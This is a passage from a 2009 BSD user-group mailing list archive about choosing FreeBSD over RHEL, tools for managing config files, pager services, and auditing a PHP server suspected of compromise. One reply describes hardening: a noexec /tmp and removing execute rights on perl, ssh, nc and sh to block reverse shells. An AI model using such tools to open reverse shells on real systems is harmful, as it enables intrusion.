7.x with MysQL 5.0.x works well, while potentially 5.1.x may not. > Does > anyone have any comments on this one? (this is probably our largest > fear). > Of course, we'll do our own benchmarking before we move :) But this is > just pre-planning questions. Check out http://people.freebsd.org/~kris/scaling/mysql.html > C) PHP - any performance differences? php on FreeBSD is just as painful as it is on Linux. > > D) Memcache - any performance differences? Take a look at mdcached http://ivoras.sharanet.org/projects/mdcached.html -- Steven Kreuzer http://www.exit2shell.com/~skreuzer From carton at Ivy.NET Fri Mar 6 14:17:46 2009 From: carton at Ivy.NET (Miles Nordin) Date: Fri, 06 Mar 2009 14:17:46 -0500 Subject: [nycbug-talk] Switch to FreeBSD from RHEL In-Reply-To: <7211AF80-6E9A-4D76-B6BE-77421D717CFD@exit2shell.com> (Steven Kreuzer's message of "Fri, 6 Mar 2009 12:08:16 -0500") References: <7211AF80-6E9A-4D76-B6BE-77421D717CFD@exit2shell.com> Message-ID: >>>>> "sk" == Steven Kreuzer writes: sk> http://www.over-yonder.net/~fullermd/rants/bsd4linux/bsd4linux1.php in: http://www.over-yonder.net/~fullermd/rants/bsd4linux/bsd4linux5.php He is only sort of right about Linux release engineering. Bitkeeper was replaced by git pretty quickly I think, and it is not just git, there is procedure surrounding it. First, there isn't a development branch with odd numbers any more, at least none that I ever hear of. Even in Linux 2.2/2.3 days most work was already happening on 2.2 and then getting forward-ported to 2.3 by dilligent frustrated people, and now no one ever talks about odd branches, especially developers. All the work happens on mini-branches off the stable (even) trunk. so, depending on what you are working on, you'll have a stable kernel plus development bits for your area of interest. Also the even trunk is allowed to become unstable between releases, which is not true of BSD's stable branches. Second, they are using git, which I think allows them to be extremely stingy with repository access compared to BSD. Almost nobody has it. But you can have local branches in git, so a read-only repository plus git works well with this stable-plus-a-few-development-bits. I think it may actually be better than what BSD does for the developer, though for a sysadmin it's a disgusting mess because you usually do not have access to all these private git repositories spread all over the place---the only one who can see the true history of the development of a certain subsystem is the guy working on it in his local repository, unless you want to try to piece it together through the ``patch sets'' he spews to mailing lists, but these don't get tracked in the main git tree, just sort of spewed. I think the private-branch thing is bad in that it tends to make people territorial about their code, BUT (1) bigger projects will have their own public git server so you CAN see their work-in-progress, though I'm not sure how easy it is to incorporate it into your kernel, because I've not learned how to do anything but download with git, and (2) honestly BSD has had *way* more problem with unproductive people remaining territorial about old, broken code when less skilled but vastly more productive people want to work on it, than Linux has, so the claim ``spread-out private repositories and stingy global git/cvs access makes people more territorial than generous cvs access'' doesn't really wash with history. Third an important part of Linux revision control is these patchsets they mail around. There is a special git command for generating patchsets in an acceptable form for email, and there is some kind of political procedure backed by code for tossing aruond these patches that I don't understand. I'm following a smaller project, the UBI/UBIfs/mtd project, because I want to figure out when they will support mtd partitions >2GB so I can (ab)use it for USB sticks. I can't figure out if they're emulating the Linux-kernel patchset political framework, or actually participating in it. The criticism that things like 'ifconfig' (or 'ip' which is what they use on Linux instead of ifconfig) are not revision-controlled along with the kernel is fucking spot-on. They are living out some bogus fantasy with all this basic housekeeping they want to ``leave up to'' the distributions, and they ought to knock it off. That said, the Gentoo tree is something in which you can make a 'cut' like BSD. And it sort-of has branches, but not in the revision control software. They have 'keywords' in portage, so each package will have a stable 'x86' version and an unstable '~x86' version. You can build an entire system with '~x86' to get the newer, less-stable packages. When they're ready they'll mark a newer package as 'x86' and move it into the stable system. but what ~x86 does, is fetch slightly newer tarballs and then build them. It doesn't give direct access to a revision control tree like BSD. It's a serious deficiency of Linux that there's such a barrier to getting from a binary on your system to a revision-controlled source tree used to build that binary. They need to find some way to keep their idea of ``distributions,'' but turn sourceforge/Savannah into one giant git repository from which all the distributions pull. ``the stricter separation of "base" vs "ports" in BSD, as well as the structure of the ports tree itself, make it easier to have multiple parallel versions of packages in BSD. Sometimes, it's even possible and easy to have multiple versions installed at the same time.'' disagree, Gentoo handles this much better than pkgsrc/ports. but discussion of package management can't be Linux vs. BSD because Linux has so many different package managers. It needs to be Gentoo vs Centos/RHEL vs Ubuntu vs pkgsrc vs freebsd-ports vs openbsd-ports vs OpenSolaris/IPS, or else it gets confusing. My favorite so far is OpenBSD ports because they disallow USE flags and package ``options'' which I think are a disaster. but a real package management system needs the support of a sandbox/chroot/snapshotting-filesystem---I'd like to see that. NetBSD has the right idea with their bulk builds of forcing packages to build in an environment that has only their declared dependencies available, but I think it could be much faster with a libc sandbox or kernel support. Also a good package system which AFAIK doesn't exist yet, should be able to parallelize builds not with 'make -j2' but by looking for wide areas of the dependency graph and building separate packages independantly. And finally it should be possible to do cross-builds using emulators, not using autoconf. Run most of the build inside the emulator, but have fancy wrappers that can break out of the emulator for running certain safe programs natively, like a C cross-compiler, gzip, nroff, u.s.w., but as far as the Makefile can tell it's running on a real MIPS CPU. ``If it's written reasonably portably, 95% or better of it will compile right off on any vaguely POSIX-compliant system.'' hah! yeah, sure, POSIX. Unless it happens to be a programming language (Java, DalvikRE, Haskell, Lisp, Erlang), an extremely large program with its own GUI widgets, module ABI's, reflection-layers (Firefox/Chrome, Xorg, Openoffice), heavily-subpackaged (Ruby, Perl, Python, Gnome, KDE, emacs), or is a web service held together by spit and duct tape (Zimbra, Socialtext) or anything else not written in C and thus *not POSIX* (slap!) such as CouchDB/H2, cvsup/git/hg/darcs. Then, you're in trouble. In short, if the Linux app in question is a single-threaded forking TCP listener written in 1980 and building with GNU autoconf, fine for BSD, minimal effort. If it's anything remotely interesting, like any of the programs people like to run these days and spend most of their time using if the people in question are not boring ponderous dinosaurs, anything alive and interesting and not fossilized, then it will be a major undertaking to get it working on BSD if its developers are working on Linux. He is so disastrously wrong on this point, and so harmful to anyone gullible enough to buy his POSIX crap, though it does not affect Matt since he is using only fossilized LAMP software. but please do not let yourself be trapped by this baloney in what ought to be an extremely exciting time for software, a real possibility at finally something post-Unix and still Free. sk> For whats its worth, during the 90's porn boom, most of the sk> sites hosting adult content ran FreeBSD because it was able to sk> handle large amounts of traffic. ...heh. yeah but what do they run now? Linux, ngix, lighttpd? sk> However, Getting web sites to scale depends on much more then sk> the underlying operating system. Its something that I could sk> talk about for hours without mentioning the OS once. k fair enough. sk> Check out http://people.freebsd.org/~kris/scaling/mysql.html impressive! so maybe the analog to the way BSD people always slam Linux for unfsd that they haven't used in 15 years, is Linux people slamming FreeBSD/mysql based on FreeBSD 6.x. what's this about mysql 5.1, though? it's faster on Linux than BSD, or it's slower everywhere? -- READ CAREFULLY. By reading this fortune, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From brian.gupta at gmail.com Sun Mar 8 00:33:29 2009 From: brian.gupta at gmail.com (Brian Gupta) Date: Sun, 8 Mar 2009 00:33:29 -0500 Subject: [nycbug-talk] sun + ms In-Reply-To: <4995C4F7.5020302@me.com> References: <4995B3AE.5080808@ceetonetechnology.com> <4995C4F7.5020302@me.com> Message-ID: <5b5090780903072133o1c06808dn2a7d86f852299b94@mail.gmail.com> Sun and Microsoft just certified (again I might add) that Windows runs on Sun's x86 HW. Non event people. Windows is certified to run on every Tier 1 server vendor's x86 HW. The fact that Sun and Microsoft have been enemies in the past, I guess creates some sort of reality distortion. Remember Microsoft makes money selling Software. (they dont' care who's) Sun makes money selling HW. (ANd frankly they don't care what runs on it) This deal goes back at least two years by the way, they are just banging the same drums again, to try and build up Sun's HW sales). Now if Microsoft had announced a Sparc port that would be something. Cheers, Brian On Fri, Feb 13, 2009 at 2:07 PM, Siobhan Lynch wrote: > On 2/13/09 12:53 PM, George Rosamond wrote: >> http://www.propelmg.com/suneast/x64/one-web.html >> >> This usually means something bad is going to happen soon. >> >> g >> _______________________________________________ >> talk mailing list >> talk at lists.nycbug.org >> http://lists.nycbug.org/mailman/listinfo/talk >> > I have friends within Sun, and I haven;t heard a thing about this - it > would have been all over the OpenSolaris community by now.. > > Brian is more connected than I am, you hear anything Brian? > > -Trish > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- - Brian Gupta New York City user groups calendar: http://nyc.brandorr.com/ From brian.gupta at gmail.com Sun Mar 8 00:36:29 2009 From: brian.gupta at gmail.com (Brian Gupta) Date: Sun, 8 Mar 2009 00:36:29 -0500 Subject: [nycbug-talk] version control for config files In-Reply-To: References: Message-ID: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> I know you think it is overkill, but seriously take a look at puppet. (I'm biased here). Basically it lets you put all your configs on a central server and then use SVN/GIT/whatever to manage it. I'd be willing to help you get started, and we have a puppet user group in NYC. (Although we would be open to expanding it to include cfengine, if there are enough cfengine folks around). -Brian On Thu, Feb 26, 2009 at 6:27 PM, Charles Sprickman wrote: > Howdy, > > I think the subject pretty much sums it up - I'm sick of not tracking > changes in /etc and /usr/local/etc. ?I want something that deal with file > permissions and is relatively transparent. > > I've been googling around, but finding not much other than weird > contortions based on CVS that make such huge disclaimers as "this of > course does not work with symlinks" or "this of course does not maintain > file ownership/permissions". > > cfengine and the like do more than I want... > > Any interesting ideas out there? > > The most I have to work with is perhaps a dozen servers, maybe almost that > many jails. > > Thanks, > > Charles > > ___ > Charles Sprickman > NetEng/SysAdmin > Bway.net - New York's Best Internet - www.bway.net > spork at bway.net - 212.655.9344 > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- - Brian Gupta New York City user groups calendar: http://nyc.brandorr.com/ From dave at donnerjack.com Sun Mar 8 00:59:56 2009 From: dave at donnerjack.com (David Lawson) Date: Sun, 8 Mar 2009 00:59:56 -0500 Subject: [nycbug-talk] version control for config files In-Reply-To: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> Message-ID: <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> Puppet is a really good option for config management, I looked really seriously at it a while back and liked what I saw a lot, but I had two major problems with it. First, it's written in Ruby and I'm not a Ruby programmer, so that kind of bites if I wanted to extend it. Second, and nearly every configuration management system I've looked at suffers from this problem, there's a pretty serious bootstrap cost to implementing it. It's a reasonably complex system, it's non- trivial to understand how to make it do what you want it to do, and when you do get a good handle on it, converting all your systems to use it can be a pretty serious undertaking, depending on how many you have. At the time, I was looking at a couple hundred, with configurations drifted all over hell and gone, so that was a time sink I couldn't afford. What I ended up doing is writing a stupid simple configuration manager in python, we call it ghetto-config in the office. I've actually been thinking about asking to open source it, I'll talk to my boss about it on Monday, but the basic concepts are simple, and it didn't take me more than an afternoon to implement a first cut. Ghetto-config works as a very simple templating engine, you define a number bunch of key value pairs, and you can use those keys in a file and have ghetto-config substitute in the appropriate value for you when it parses it. It also understands how to set file modes, create symlinks, manage owners and groups, and how to diff version of a file if it's changed. Basically, you assign each machine a unique ID of some sort at install time (or later, if you want), we used the MAC address of the interface that was used to PXE boot the machine for kickstart, but you could use hostname or whatever if that was easier. That serves as the unique identifier for the system. Ghetto-config takes that information and uses it to build a URL to fetch configuration information from a central HTTP server storing config data. It fetches the URL it builds and gets back a file in config parser syntax (basically an .ini file) with a couple special sections. The first section is includes, so it can include in other config parser syntax files. The second is definitions, it allows to set up key-value pairs, like $eth0-ip$ = 192.168.1.15, and the third set of managed file sections. Each managed file section gives the URL to fetch the template from (so you can use the same template file for multiple machines by just pointing to the URL of a canonical version) and the location on the file system to write the rendered template to once the substitutions have been performed. It optionally includes a file mode, owner, group, and the location of a symlink to make to the file location. There's some additional detail in structuring the central config server and doing some other stuff that makes it simpler to manage, but that's the gist of it. It's about two hundred lines of python, it supports doing diffs between the central configuration and the local reality for any attribute it understands (so file contents, owner, group, mode, etc.) as well as a programmatic mode intended to be run from cron that'll tell you whether anything has changed on the machine so you can make sure none of your machines have drifted nightly, etc. We've started checking the central config tree into SVN so we have an audit trail of who did what to what file. Does it do everything puppet does? God no. Does it do everything cfengine does? Again, god no. It's an 80/20 solution, it took me an afternoon to write the first version of it, and maybe a week of total development time to get it doing what it does and full test coverage for it. It happily manages several hundred machines, it makes installing and provisioning a new machine a thirty second job instead of a half hour or so, and it makes managing software installs over multiple machines much, much easier and more deterministic. Like I said, I've been planning on asking about open sourcing it anyway, but if I don't get to do that, I'll be happy to answer questions or give pointers where I can. --Dave On Mar 8, 2009, at 12:36 AM, Brian Gupta wrote: > I know you think it is overkill, but seriously take a look at puppet. > (I'm biased here). Basically it lets you put all your configs on a > central server and then use SVN/GIT/whatever to manage it. > > I'd be willing to help you get started, and we have a puppet user > group in NYC. (Although we would be open to expanding it to include > cfengine, if there are enough cfengine folks around). > > -Brian > > On Thu, Feb 26, 2009 at 6:27 PM, Charles Sprickman > wrote: >> Howdy, >> >> I think the subject pretty much sums it up - I'm sick of not tracking >> changes in /etc and /usr/local/etc. I want something that deal >> with file >> permissions and is relatively transparent. >> >> I've been googling around, but finding not much other than weird >> contortions based on CVS that make such huge disclaimers as "this of >> course does not work with symlinks" or "this of course does not >> maintain >> file ownership/permissions". >> >> cfengine and the like do more than I want... >> >> Any interesting ideas out there? >> >> The most I have to work with is perhaps a dozen servers, maybe >> almost that >> many jails. >> >> Thanks, >> >> Charles >> >> ___ >> Charles Sprickman >> NetEng/SysAdmin >> Bway.net - New York's Best Internet - www.bway.net >> spork at bway.net - 212.655.9344 >> >> _______________________________________________ >> talk mailing list >> talk at lists.nycbug.org >> http://lists.nycbug.org/mailman/listinfo/talk >> > > > > > -- > - Brian Gupta > > New York City user groups calendar: > http://nyc.brandorr.com/ > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From ike at lesmuug.org Sun Mar 8 01:20:38 2009 From: ike at lesmuug.org (Isaac Levy) Date: Sun, 8 Mar 2009 01:20:38 -0500 Subject: [nycbug-talk] version control for config files In-Reply-To: <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> Message-ID: <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> On Mar 8, 2009, at 12:59 AM, David Lawson wrote: > Puppet is a really good option for config management, I looked really > seriously at it a while back and liked what I saw a lot, but I had two > major problems with it. First, it's written in Ruby and I'm not a > Ruby programmer, so that kind of bites if I wanted to extend it. > Second, and nearly every configuration management system I've looked > at suffers from this problem, there's a pretty serious bootstrap cost > to implementing it. It's a reasonably complex system, it's non- > trivial to understand how to make it do what you want it to do, and > when you do get a good handle on it, converting all your systems to > use it can be a pretty serious undertaking, depending on how many you > have. At the time, I was looking at a couple hundred, with > configurations drifted all over hell and gone, so that was a time sink > I couldn't afford. > > What I ended up doing is writing a stupid simple configuration manager > in python, we call it ghetto-config in the office. I've actually been > thinking about asking to open source it, I'll talk to my boss about it > on Monday, but the basic concepts are simple, and it didn't take me > more than an afternoon to implement a first cut. > > Ghetto-config works as a very simple templating engine, you define a > number bunch of key value pairs, and you can use those keys in a file > and have ghetto-config substitute in the appropriate value for you > when it parses it. It also understands how to set file modes, create > symlinks, manage owners and groups, and how to diff version of a file > if it's changed. > > Basically, you assign each machine a unique ID of some sort at install > time (or later, if you want), we used the MAC address of the interface > that was used to PXE boot the machine for kickstart, but you could use > hostname or whatever if that was easier. That serves as the unique > identifier for the system. Ghetto-config takes that information and > uses it to build a URL to fetch configuration information from a > central HTTP server storing config data. It fetches the URL it builds > and gets back a file in config parser syntax (basically an .ini file) > with a couple special sections. The first section is includes, so it > can include in other config parser syntax files. The second is > definitions, it allows to set up key-value pairs, like $eth0-ip$ = > 192.168.1.15, and the third set of managed file sections. > > Each managed file section gives the URL to fetch the template from (so > you can use the same template file for multiple machines by just > pointing to the URL of a canonical version) and the location on the > file system to write the rendered template to once the substitutions > have been performed. It optionally includes a file mode, owner, > group, and the location of a symlink to make to the file location. > > There's some additional detail in structuring the central config > server and doing some other stuff that makes it simpler to manage, but > that's the gist of it. It's about two hundred lines of python, it > supports doing diffs between the central configuration and the local > reality for any attribute it understands (so file contents, owner, > group, mode, etc.) as well as a programmatic mode intended to be run > from cron that'll tell you whether anything has changed on the machine > so you can make sure none of your machines have drifted nightly, etc. > We've started checking the central config tree into SVN so we have an > audit trail of who did what to what file. > > Does it do everything puppet does? God no. Does it do everything > cfengine does? Again, god no. It's an 80/20 solution, it took me an > afternoon to write the first version of it, and maybe a week of total > development time to get it doing what it does and full test coverage > for it. It happily manages several hundred machines, it makes > installing and provisioning a new machine a thirty second job instead > of a half hour or so, and it makes managing software installs over > multiple machines much, much easier and more deterministic. > > Like I said, I've been planning on asking about open sourcing it > anyway, but if I don't get to do that, I'll be happy to answer > questions or give pointers where I can. > > --Dave This sounds hot- I wanna try it :) Rocket- .ike From spork at bway.net Sun Mar 8 01:32:41 2009 From: spork at bway.net (Charles Sprickman) Date: Sun, 8 Mar 2009 01:32:41 -0500 (EST) Subject: [nycbug-talk] version control for config files In-Reply-To: <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> Message-ID: On Sun, 8 Mar 2009, Isaac Levy wrote: > On Mar 8, 2009, at 12:59 AM, David Lawson wrote: > >> Puppet is a really good option for config management, I looked really >> seriously at it a while back and liked what I saw a lot, but I had two >> major problems with it. First, it's written in Ruby and I'm not a >> Ruby programmer, so that kind of bites if I wanted to extend it. >> Second, and nearly every configuration management system I've looked >> at suffers from this problem, there's a pretty serious bootstrap cost >> to implementing it. It's a reasonably complex system, it's non- >> trivial to understand how to make it do what you want it to do, and >> when you do get a good handle on it, converting all your systems to >> use it can be a pretty serious undertaking, depending on how many you >> have. At the time, I was looking at a couple hundred, with >> configurations drifted all over hell and gone, so that was a time sink >> I couldn't afford. >> >> What I ended up doing is writing a stupid simple configuration manager >> in python, we call it ghetto-config in the office. I've actually been >> thinking about asking to open source it, I'll talk to my boss about it >> on Monday, but the basic concepts are simple, and it didn't take me >> more than an afternoon to implement a first cut. >> >> Ghetto-config works as a very simple templating engine, you define a >> number bunch of key value pairs, and you can use those keys in a file >> and have ghetto-config substitute in the appropriate value for you >> when it parses it. It also understands how to set file modes, create >> symlinks, manage owners and groups, and how to diff version of a file >> if it's changed. >> >> Basically, you assign each machine a unique ID of some sort at install >> time (or later, if you want), we used the MAC address of the interface >> that was used to PXE boot the machine for kickstart, but you could use >> hostname or whatever if that was easier. That serves as the unique >> identifier for the system. Ghetto-config takes that information and >> uses it to build a URL to fetch configuration information from a >> central HTTP server storing config data. It fetches the URL it builds >> and gets back a file in config parser syntax (basically an .ini file) >> with a couple special sections. The first section is includes, so it >> can include in other config parser syntax files. The second is >> definitions, it allows to set up key-value pairs, like $eth0-ip$ = >> 192.168.1.15, and the third set of managed file sections. >> >> Each managed file section gives the URL to fetch the template from (so >> you can use the same template file for multiple machines by just >> pointing to the URL of a canonical version) and the location on the >> file system to write the rendered template to once the substitutions >> have been performed. It optionally includes a file mode, owner, >> group, and the location of a symlink to make to the file location. >> >> There's some additional detail in structuring the central config >> server and doing some other stuff that makes it simpler to manage, but >> that's the gist of it. It's about two hundred lines of python, it >> supports doing diffs between the central configuration and the local >> reality for any attribute it understands (so file contents, owner, >> group, mode, etc.) as well as a programmatic mode intended to be run >> from cron that'll tell you whether anything has changed on the machine >> so you can make sure none of your machines have drifted nightly, etc. >> We've started checking the central config tree into SVN so we have an >> audit trail of who did what to what file. >> >> Does it do everything puppet does? God no. Does it do everything >> cfengine does? Again, god no. It's an 80/20 solution, it took me an >> afternoon to write the first version of it, and maybe a week of total >> development time to get it doing what it does and full test coverage >> for it. It happily manages several hundred machines, it makes >> installing and provisioning a new machine a thirty second job instead >> of a half hour or so, and it makes managing software installs over >> multiple machines much, much easier and more deterministic. >> >> Like I said, I've been planning on asking about open sourcing it >> anyway, but if I don't get to do that, I'll be happy to answer >> questions or give pointers where I can. >> >> --Dave > > > This sounds hot- I wanna try it :) Ditto. Specifically, it sounds simple enough to actually sit down and implement, which is what has scared me away from everything else. Charles > Rocket- > .ike > > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From pete at nomadlogic.org Sun Mar 8 13:08:09 2009 From: pete at nomadlogic.org (Pete Wright) Date: Sun, 8 Mar 2009 10:08:09 -0700 Subject: [nycbug-talk] version control for config files In-Reply-To: References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> Message-ID: <96B01A98-E22F-4121-9BA0-F0C5D6B62B5C@nomadlogic.org> On 7-Mar-09, at 10:32 PM, Charles Sprickman wrote: > On Sun, 8 Mar 2009, Isaac Levy wrote: > >> On Mar 8, 2009, at 12:59 AM, David Lawson wrote: >> >>> Puppet is a really good option for config management, I looked >>> really >>> seriously at it a while back and liked what I saw a lot, but I had >>> two >>> major problems with it. First, it's written in Ruby and I'm not a >>> Ruby programmer, so that kind of bites if I wanted to extend it. >>> Second, and nearly every configuration management system I've looked >>> at suffers from this problem, there's a pretty serious bootstrap >>> cost >>> to implementing it. It's a reasonably complex system, it's non- >>> trivial to understand how to make it do what you want it to do, and >>> when you do get a good handle on it, converting all your systems to >>> use it can be a pretty serious undertaking, depending on how many >>> you >>> have. At the time, I was looking at a couple hundred, with >>> configurations drifted all over hell and gone, so that was a time >>> sink >>> I couldn't afford. >>> >>> What I ended up doing is writing a stupid simple configuration >>> manager >>> in python, we call it ghetto-config in the office. I've actually >>> been >>> thinking about asking to open source it, I'll talk to my boss >>> about it >>> on Monday, but the basic concepts are simple, and it didn't take me >>> more than an afternoon to implement a first cut. >>> >>> Ghetto-config works as a very simple templating engine, you define a >>> number bunch of key value pairs, and you can use those keys in a >>> file >>> and have ghetto-config substitute in the appropriate value for you >>> when it parses it. It also understands how to set file modes, >>> create >>> symlinks, manage owners and groups, and how to diff version of a >>> file >>> if it's changed. >>> >>> Basically, you assign each machine a unique ID of some sort at >>> install >>> time (or later, if you want), we used the MAC address of the >>> interface >>> that was used to PXE boot the machine for kickstart, but you could >>> use >>> hostname or whatever if that was easier. That serves as the unique >>> identifier for the system. Ghetto-config takes that information and >>> uses it to build a URL to fetch configuration information from a >>> central HTTP server storing config data. It fetches the URL it >>> builds >>> and gets back a file in config parser syntax (basically an .ini >>> file) >>> with a couple special sections. The first section is includes, so >>> it >>> can include in other config parser syntax files. The second is >>> definitions, it allows to set up key-value pairs, like $eth0-ip$ = >>> 192.168.1.15, and the third set of managed file sections. >>> >>> Each managed file section gives the URL to fetch the template from >>> (so >>> you can use the same template file for multiple machines by just >>> pointing to the URL of a canonical version) and the location on the >>> file system to write the rendered template to once the substitutions >>> have been performed. It optionally includes a file mode, owner, >>> group, and the location of a symlink to make to the file location. >>> >>> There's some additional detail in structuring the central config >>> server and doing some other stuff that makes it simpler to manage, >>> but >>> that's the gist of it. It's about two hundred lines of python, it >>> supports doing diffs between the central configuration and the local >>> reality for any attribute it understands (so file contents, owner, >>> group, mode, etc.) as well as a programmatic mode intended to be run >>> from cron that'll tell you whether anything has changed on the >>> machine >>> so you can make sure none of your machines have drifted nightly, >>> etc. >>> We've started checking the central config tree into SVN so we have >>> an >>> audit trail of who did what to what file. >>> >>> Does it do everything puppet does? God no. Does it do everything >>> cfengine does? Again, god no. It's an 80/20 solution, it took me >>> an >>> afternoon to write the first version of it, and maybe a week of >>> total >>> development time to get it doing what it does and full test coverage >>> for it. It happily manages several hundred machines, it makes >>> installing and provisioning a new machine a thirty second job >>> instead >>> of a half hour or so, and it makes managing software installs over >>> multiple machines much, much easier and more deterministic. >>> >>> Like I said, I've been planning on asking about open sourcing it >>> anyway, but if I don't get to do that, I'll be happy to answer >>> questions or give pointers where I can. >>> >>> --Dave >> >> >> This sounds hot- I wanna try it :) > > Ditto. > > Specifically, it sounds simple enough to actually sit down and > implement, > which is what has scared me away from everything else. > should check out cobbler if you all are interested in a provisioning mgt system: https://fedorahosted.org/cobbler/ yea, it's currently RHEL/Fedora based, but i've used it for a while now to manage other OS's. it's written in python, and it supports Cheeta templates inside kickstart/preseed/ files. it also manages dhcpd and bind configs pretty well and has a webUI. the developer works for redhat - but he's a super nice guy and really wants better BSD and non-rhel support for his project. it integrates with puppet quite well too... -p From riegersteve at gmail.com Sun Mar 8 14:45:34 2009 From: riegersteve at gmail.com (riegersteve at gmail.com) Date: Sun, 8 Mar 2009 18:45:34 +0000 Subject: [nycbug-talk] version control for config files Message-ID: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry> Here at ticketmaster we use an inhouse piece that we released as opensource. Called rubix -- Sent via Blackberry I can be reached at 310-947-8565 From dave at donnerjack.com Sun Mar 8 16:30:58 2009 From: dave at donnerjack.com (David Lawson) Date: Sun, 8 Mar 2009 16:30:58 -0400 Subject: [nycbug-talk] version control for config files In-Reply-To: <96B01A98-E22F-4121-9BA0-F0C5D6B62B5C@nomadlogic.org> References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> <96B01A98-E22F-4121-9BA0-F0C5D6B62B5C@nomadlogic.org> Message-ID: <12C65CEE-53CF-4652-BF8A-CB49BD96FDEE@donnerjack.com> > should check out cobbler if you all are interested in a provisioning > mgt system: > > https://fedorahosted.org/cobbler/ > > yea, it's currently RHEL/Fedora based, but i've used it for a while > now to manage other OS's. it's written in python, and it supports > Cheeta templates inside kickstart/preseed/ responder-here> files. it also manages dhcpd and bind configs pretty > well and has a webUI. > > the developer works for redhat - but he's a super nice guy and really > wants better BSD and non-rhel support for his project. > > it integrates with puppet quite well too... We actually use that as well, it replaced our original, simpler kickstart system. We haven't seen a lot of value add out of it, honestly, but I have a feeling we aren't leveraging its functionality as well as we should be, the guy who deployed it isn't big on documentation or communication, so it's just kind of there. What kind of additional features beyond basic kickstart are you guys getting from it? --Dave From brian.gupta at gmail.com Sun Mar 8 17:45:34 2009 From: brian.gupta at gmail.com (Brian Gupta) Date: Sun, 8 Mar 2009 16:45:34 -0500 Subject: [nycbug-talk] Pager Vendors? In-Reply-To: <28025CF5-740E-43F9-AB01-691679178E7C@lesmuug.org> References: <28025CF5-740E-43F9-AB01-691679178E7C@lesmuug.org> Message-ID: <5b5090780903081445t6d71d26fy4e164563b49ec642@mail.gmail.com> They also have better battery life, and are more indestructible/reliable in general for emergency services. Gonna put in a +1 for Marc's suggestion of skytel.com -Brian On Wed, Feb 11, 2009 at 10:31 AM, Isaac Levy wrote: > Hi All, > > Does anyone have a good old-school pager service vendor in the city, > or have any tips? > > (For those who forgot, it's the little box with an LCD screen- they > were around before cellphones... It operates on a different, simpler > radio frequency, and the units get far better reception than a > cellphone.) > > Rocket, > .ike > > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- - Brian Gupta New York City user groups calendar: http://nyc.brandorr.com/ From tekronis at gmail.com Sun Mar 8 21:17:48 2009 From: tekronis at gmail.com (H. G.) Date: Sun, 8 Mar 2009 21:17:48 -0400 Subject: [nycbug-talk] version control for config files In-Reply-To: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry> References: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry> Message-ID: <60131f920903081817q658d3023s63c61b93b3eab528@mail.gmail.com> On Sun, Mar 8, 2009 at 2:45 PM, wrote: > Here at ticketmaster we use an inhouse piece that we released as > opensource. Called rubix Has it been renamed to "Spine"? ( http://code.google.com/p/spine-mgmt/ ) ? -------------- next part -------------- An HTML attachment was scrubbed... URL: From matt at atopia.net Mon Mar 9 00:54:26 2009 From: matt at atopia.net (Matt Juszczak) Date: Mon, 9 Mar 2009 00:54:26 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: > Yes, /tmp is the favorite directory of all www script kiddies and other > crackers. Mounting it noexec can help a little bit, but I also disable > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able > to open a remote reverse shell. I really think that php websites > nowadays are number one on the crackers' list. Is there a document with a list of steps that could potentially help this? Also, is there a possible default mtree file I could use for 6.3-RELEASE since I didn't generate one in the beginning? What's the best way to audit an *existing* server with PHP running on it, etc. We've got some wordpress installs, etc. - unsure if any were vulnerable. -M From akosela at andykosela.com Mon Mar 9 07:21:13 2009 From: akosela at andykosela.com (Andy Kosela) Date: Mon, 09 Mar 2009 12:21:13 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> Matt Juszczak wrote: > > Yes, /tmp 